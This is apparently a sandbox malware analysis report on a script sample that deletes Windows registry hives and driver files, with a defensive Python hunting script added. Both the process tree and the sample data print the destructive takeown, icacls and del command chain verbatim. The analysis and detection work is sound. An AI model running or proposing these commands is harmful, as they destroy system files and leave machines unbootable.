Analysis
- max time kernel: 149s
- max time network: 151s
- platform: windows10-2004_x64
- resource: win10v2004-20240802-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 15-08-2024 21:37

Static task: static1
Behavioral task: behavioral1
Sample: target.wsf
Resource: win7-20240704-en
General
- Target: target.wsf
- Size: 2KB
- MD5: 6425a144c5de5bc3bcd5865809150a0d
- SHA1: 257d00e71e71832c90fc494b5121df3a8149560d
- SHA256: 7c2461116f624799741f4983fb1bbb69c7c0024e7b258d8c79208669a75a69ad
- SHA512: 95dd1168240a1e2011d45d2efe406ef88ee90140c97e9ec585fdd27ce15aa75a1479beae143a6d9717ed29002d818f165a2ad8910bc3b9ccc5d847024a173e34
Malware Config
Signatures
- Possible privilege escalation attempt (4 IoCs)
  Processes (pid, process): 3476 icacls.exe; 4072 takeown.exe; 3152 takeown.exe; 5112 icacls.exe
- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation (cmd.exe)
  Key value queried: \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation (WScript.exe)
- Modifies file permissions (1 TTP, 4 IoCs)
  Processes (pid, process): 4072 takeown.exe; 3152 takeown.exe; 5112 icacls.exe; 3476 icacls.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Modifies registry class (1 IoC)
  Key created: \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings (cmd.exe)
- Opens file in notepad (likely ransom note) (2 IoCs)
  Processes (pid, process): 2912 Notepad.exe; 2328 Notepad.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Token: SeTakeOwnershipPrivilege enabled by 4072 takeown.exe
- Suspicious use of WriteProcessMemory (14 IoCs)
  Each parent-to-child write below is reported twice (pid process -> target pid process):
  3216 cmd.exe -> 3292 WScript.exe
  3292 WScript.exe -> 3820 cmd.exe
  3292 WScript.exe -> 2624 cmd.exe
  2624 cmd.exe -> 4072 takeown.exe
  3820 cmd.exe -> 3152 takeown.exe
  3820 cmd.exe -> 5112 icacls.exe
  2624 cmd.exe -> 3476 icacls.exe
Processes (indentation shows the parent/child relationship; the bracketed number is the tree depth)

[1] C:\Windows\system32\cmd.exe  PID:3216
    cmd /c "copy C:\Users\Admin\AppData\Local\Temp\target.wsf thescript.vbs && start thescript.vbs"
    Signatures: Checks computer location settings; Modifies registry class; Suspicious use of WriteProcessMemory
    [2] C:\Windows\System32\WScript.exe  PID:3292
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"
        Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
        [3] C:\Windows\System32\cmd.exe  PID:3820
            "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
            Signatures: Suspicious use of WriteProcessMemory
            [4] C:\Windows\system32\takeown.exe  PID:3152
                takeown /f c:\windows\system32\config\*
                Signatures: Possible privilege escalation attempt; Modifies file permissions
            [4] C:\Windows\system32\icacls.exe  PID:5112
                icacls c:\windows\system32\config\* /grant everyone:(f)
                Signatures: Possible privilege escalation attempt; Modifies file permissions
        [3] C:\Windows\System32\cmd.exe  PID:2624
            "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
            Signatures: Suspicious use of WriteProcessMemory
            [4] C:\Windows\system32\takeown.exe  PID:4072
                takeown /f c:\windows\system32\drivers\*
                Signatures: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
            [4] C:\Windows\system32\icacls.exe  PID:3476
                icacls c:\windows\system32\drivers\* /grant everyone:(f)
                Signatures: Possible privilege escalation attempt; Modifies file permissions

[1] C:\Windows\System32\rundll32.exe  PID:2940
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

[1] C:\Windows\System32\Notepad.exe  PID:2912
    "C:\Windows\System32\Notepad.exe" C:\Users\Admin\AppData\Local\Temp\target.wsf
    Signatures: Opens file in notepad (likely ransom note)

[1] C:\Windows\System32\WScript.exe  PID:4560
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.wsf"

[1] C:\Windows\System32\Notepad.exe  PID:2328
    "C:\Windows\System32\Notepad.exe" C:\Users\Admin\AppData\Local\Temp\thescript.vbs
    Signatures: Opens file in notepad (likely ransom note)

[1] C:\Windows\System32\WScript.exe  PID:4300
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\ConfirmResize.vbs"
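A note on reading the tree: the sandbox labels takeown and icacls as "Possible privilege escalation attempt", but each shell runs takeown /f, icacls /grant everyone:(f) and then del /s /q against c:\windows\system32\config (the registry hives) and c:\windows\system32\drivers. takeown needs SeTakeOwnershipPrivilege (visible under "Suspicious use of AdjustPrivilegeToken" on PID 4072), which only an elevated token holds by default, so this chain is a destructive payload that requires admin rights rather than a way to obtain them. The following hunt is an added example written for this page, not part of the sandbox report or its signature engine: it walks process-creation records, splits each cmd.exe command line on "&&", strips redirections such as ">nul 2>&1", and flags takeown, Everyone-full-control grants and deletes under protected directories, the full three-step chain inside one shell, and a script host (WScript.exe/CScript.exe) spawning cmd.exe. The record layout (pid, ppid, image, cmdline), the rule names, the PROTECTED_DIRS list and the ppid of 0 for roots are my own constructions; SAMPLE_EVENTS is transcribed from the command lines in the tree above.

```python
"""Hunt for the takeown -> icacls -> del chain from the process tree above.

Constructed example (not part of the sandbox report). Each record is a
process-creation event: pid, parent pid, image path and command line.
"""
import re
from collections import namedtuple

Event = namedtuple("Event", "pid ppid image cmdline")

# Directories whose loss leaves the host unbootable: registry hives and
# driver images. Starting list only (assumption); extend for your estate.
PROTECTED_DIRS = (r"c:\windows\system32\config", r"c:\windows\system32\drivers")

# Leading 'cmd /c' or '"...\cmd.exe" /c' wrapper, and output redirections
# such as '>nul' and '2>&1' (the redirection target must be space-separated).
SHELL_PREFIX = re.compile(r'^\s*(?:"[^"]*cmd(?:\.exe)?"|\S*cmd(?:\.exe)?)\s+/[ck]\s+', re.I)
REDIRECT = re.compile(r"\s*\d?>(?:>|&)?\s*\S*")
# icacls grantee that hands Everyone (or its well-known SID S-1-1-0) full control.
EVERYONE_FULL = re.compile(r"^(?:everyone|\*?s-1-1-0):\(?f\)?$")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")


def split_chain(cmdline):
    """Return the simple commands of a cmd.exe command line, split on '&&'."""
    body = SHELL_PREFIX.sub("", cmdline, count=1).strip()
    if len(body) >= 2 and body[0] == '"' and body[-1] == '"':
        body = body[1:-1]          # cmd /c "a && b" quoting
    body = REDIRECT.sub("", body)
    return [c.strip() for c in body.split("&&") if c.strip()]


def classify(cmd):
    """Map one simple command to (rule, target) or None. Tokens are whitespace
    split, so quoted paths containing spaces are not handled here."""
    toks = [t.strip('"').lower() for t in cmd.split()]
    if not toks:
        return None
    tool = toks[0].rsplit("\\", 1)[-1]
    tool = tool[:-4] if tool.endswith(".exe") else tool
    targets = [t for t in toks[1:] if t.startswith(PROTECTED_DIRS)]
    if not targets:
        return None
    if tool == "takeown" and "/f" in toks:
        return ("takeown_protected", targets[0])
    if tool == "icacls" and "/grant" in toks and any(EVERYONE_FULL.match(t) for t in toks):
        return ("icacls_everyone_full", targets[0])
    if tool in ("del", "erase"):
        return ("delete_protected", targets[0])
    return None


def analyze(events):
    """Return (pid, rule, detail) findings; one 'destructive_acl_chain' per
    shell that runs all three steps in a single command line."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        image = e.image.rsplit("\\", 1)[-1].lower()
        parent = by_pid.get(e.ppid)
        if parent and image == "cmd.exe" and parent.image.rsplit("\\", 1)[-1].lower() in SCRIPT_HOSTS:
            findings.append((e.pid, "script_host_spawned_shell", parent.image))
        hits = [h for h in map(classify, split_chain(e.cmdline)) if h]
        findings.extend((e.pid, rule, target) for rule, target in hits)
        if {"takeown_protected", "icacls_everyone_full", "delete_protected"} <= {r for r, _ in hits}:
            findings.append((e.pid, "destructive_acl_chain", hits[-1][1]))
    return findings


# Records transcribed from the process tree in this report (ppid 0 = no parent shown).
SAMPLE_EVENTS = [
    Event(3216, 0, r"C:\Windows\system32\cmd.exe",
          r'cmd /c "copy C:\Users\Admin\AppData\Local\Temp\target.wsf thescript.vbs && start thescript.vbs"'),
    Event(3292, 3216, r"C:\Windows\System32\WScript.exe",
          r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"'),
    Event(3820, 3292, r"C:\Windows\System32\cmd.exe",
          r'"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && '
          r'icacls c:\windows\system32\config\* /grant everyone:(f) >nul && '
          r'del /s /q c:\windows\system32\config\* >nul 2>&1'),
    Event(3152, 3820, r"C:\Windows\system32\takeown.exe", r"takeown /f c:\windows\system32\config\*"),
    Event(5112, 3820, r"C:\Windows\system32\icacls.exe", r"icacls c:\windows\system32\config\* /grant everyone:(f)"),
    Event(2624, 3292, r"C:\Windows\System32\cmd.exe",
          r'"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && '
          r'icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && '
          r'del /s /q c:\windows\system32\drivers\* >nul 2>&1'),
    Event(4072, 2624, r"C:\Windows\system32\takeown.exe", r"takeown /f c:\windows\system32\drivers\*"),
    Event(3476, 2624, r"C:\Windows\system32\icacls.exe", r"icacls c:\windows\system32\drivers\* /grant everyone:(f)"),
    Event(2940, 0, r"C:\Windows\System32\rundll32.exe",
          r"C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll "
          r"{9aa46009-3ce0-458a-a354-715610a075e6} -Embedding"),
    Event(2912, 0, r"C:\Windows\System32\Notepad.exe",
          r'"C:\Windows\System32\Notepad.exe" C:\Users\Admin\AppData\Local\Temp\target.wsf'),
]

if __name__ == "__main__":
    for pid, rule, detail in analyze(SAMPLE_EVENTS):
        print(f"{pid:>5}  {rule:<26} {detail}")
```

Run against SAMPLE_EVENTS it reports 14 findings, with destructive_acl_chain on PIDs 3820 and 2624 and nothing on the rundll32 and Notepad noise. The child takeown and icacls processes are flagged on their own command lines as well, so the rules still fire when the wrapping shell's command line is not logged. Splitting only on "&&" is deliberate: the sample uses it, and splitting on a bare "&" would break "2>&1"; a production version should also handle "||", "|" and quoted paths with spaces.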
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 144B
  MD5: 7efc82c24c2ce07d6e37f750cc9aa312
  SHA1: 24641d0653f3b3b850b25319bdae26bf1a46040a
  SHA256: 78d136408cfd4790b861a67f1a7acb826c7c7e8ee75aa7fa5b60ae6e33216d4f
  SHA512: a1a3ee6fa3bfede92806362447b787a29b3ad1e9f64322eec4c8ef38e7a3742eef843373da1461512bc7ee83953344ff67fff2c46eb57fc2feca9e632847edde
- Filesize: 2KB (same hashes as the submitted target.wsf)
  MD5: 6425a144c5de5bc3bcd5865809150a0d
  SHA1: 257d00e71e71832c90fc494b5121df3a8149560d
  SHA256: 7c2461116f624799741f4983fb1bbb69c7c0024e7b258d8c79208669a75a69ad
  SHA512: 95dd1168240a1e2011d45d2efe406ef88ee90140c97e9ec585fdd27ce15aa75a1479beae143a6d9717ed29002d818f165a2ad8910bc3b9ccc5d847024a173e34
- Filesize: 78B
  MD5: ece02545122cc48c9d8afaf3f94dd04f
  SHA1: 8e07b6da685faad07f8413230a95ce0ae8987e0d
  SHA256: 5098743dbbd65767e7795bb819c00d091a749f0905fe0d496a06fc192efd0206
  SHA512: e6c8df55b9845ea00301b0560321489cf064bfc02793495942e216a25f76b809a61d90ab0ce8ce4e514f626f368861c9f9b7814e3730e6482f0e2f40e88a2eb5
- Filesize: 2B
  MD5: 81051bcc2cf1bedf378224b0a93e2877
  SHA1: ba8ab5a0280b953aa97435ff8946cbcbb2755a27
  SHA256: 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
  SHA512: 1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d